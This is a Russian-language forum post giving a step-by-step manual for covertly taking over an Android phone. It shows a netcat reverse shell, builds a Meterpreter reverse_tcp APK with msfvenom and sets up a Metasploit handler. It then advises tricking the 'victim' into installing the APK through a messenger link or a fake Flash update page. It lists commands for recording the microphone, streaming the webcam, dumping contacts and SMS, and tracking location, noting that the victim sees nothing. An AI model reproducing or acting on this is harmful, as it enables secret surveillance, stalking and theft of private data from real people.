• VLMI - форум по обмену информацией. На форуме можете найти способы заработка, разнообразную информацию по интернет-безопасности, обмен знаниями, курсы/сливы.

    После регистрации будут доступны основные разделы.

    Контент форума создают пользователи, администрация за действия пользователей не несёт ответственности, отказ от ответственности. Так же перед использованием форума необходимо ознакомиться с правилами ресурса. Продолжая использовать ресурс вы соглашаетесь с правилами.
  • Подпишись на наш канал в Telegram для информации о актуальных зеркалах форума: https://t.me/vlmiclub

Как получить доступ к Android

ImmortalDevil

Участник
Сообщения
3
Реакции
1
0 руб.

В этой статье хочу рассказать об одном способе, который позволяет получить доступ до смартфона базе Android. Часть материала будет предоставлено в форме мануала с пошаговыми действиями, а часть – для философских раздумий и интерпретаций. Все зависит от ваших целей, знаний и подкованности жертвы и т.д. Если у вас нет доступа к конкретному смартфону, то нужно будет пофантазировать с социальной инженерией.

a866c3401c3c10003d774.jpg



Принцип работы
Простыми словами, сначала мы создадим приложение(payload), потом определенным образом доставим жертве, а в конце у нас будет сессия meterpreter. Все операции выполняются с помощью утилит на базе операционной системы Kali Linux.

Принцип работы проще всего понять на примере двух окон терминала. Представим, что это жертва и хакер. Последний запускает в себя команду в терминале:

nc -l -p 8577
Жертва в свою очередь подключается к этому открытому порту:

nc 192.168.1.1 8577 -e /bin/bash
Таким образом, произошло подключение к открытому порту. Теперь в первом терминале можно запустить несколько команд, которые можно использовать на машине жертвы.

Вот по такому принципу мы будет работать с android. Принцип работы с payload может быть намного сложнее, но в этом основная суть.

Создание payload
Открываем терминал и с помощью такого набора создаем приложение с расширением. apk, которое будет доступно в корневой директории. Вместо звездочки нужно указать свой IP. Можно быстро посмотреть в терминале с помощью команды ifconfig:

msfvenom -p android/meterpreter/reverse_tcp LHOST=* LPORT=4444 R >shell.apk
После выполнения команды в корневой директории будет создан файл shell.apk.

7bb18bf622adb151f6bf8.png

shell.apk
Далее необходимо запустить msfconsole.

msfconsole
48ad8d4cf4050bd4d4f7c.png

msfconsole
После этого последовательно выполняем все команды:

use exploit/multi/handlerset payload android/meterpreter/reverse_tcpset LHOST ВашIPset LPORT 4444exploit
После этого, жертва должна сказать и запустить наш shell.apk. Как это сделать – это философский вопрос. Можно отправить ссылку в мессенджер. Можно, как вариант сделать сайт с заглушкой под обновление флеш плера. Таким образом, пользователь зайдет и начнет скачивать обновление. После этого будет установлена сессия удаленного управления.

Некоторые полезные команды:
record_mic

webcam_snap

webcam_stream

dump_contacts

dump_sms

geolocate

После установления сессии на телефоне не происходит никаких действий. Можно спокойно удаленно следить за жертвой, если у нее будет активное интернет соединение.

И запомни - не копипаст, а распространение.
 
Сверху Снизу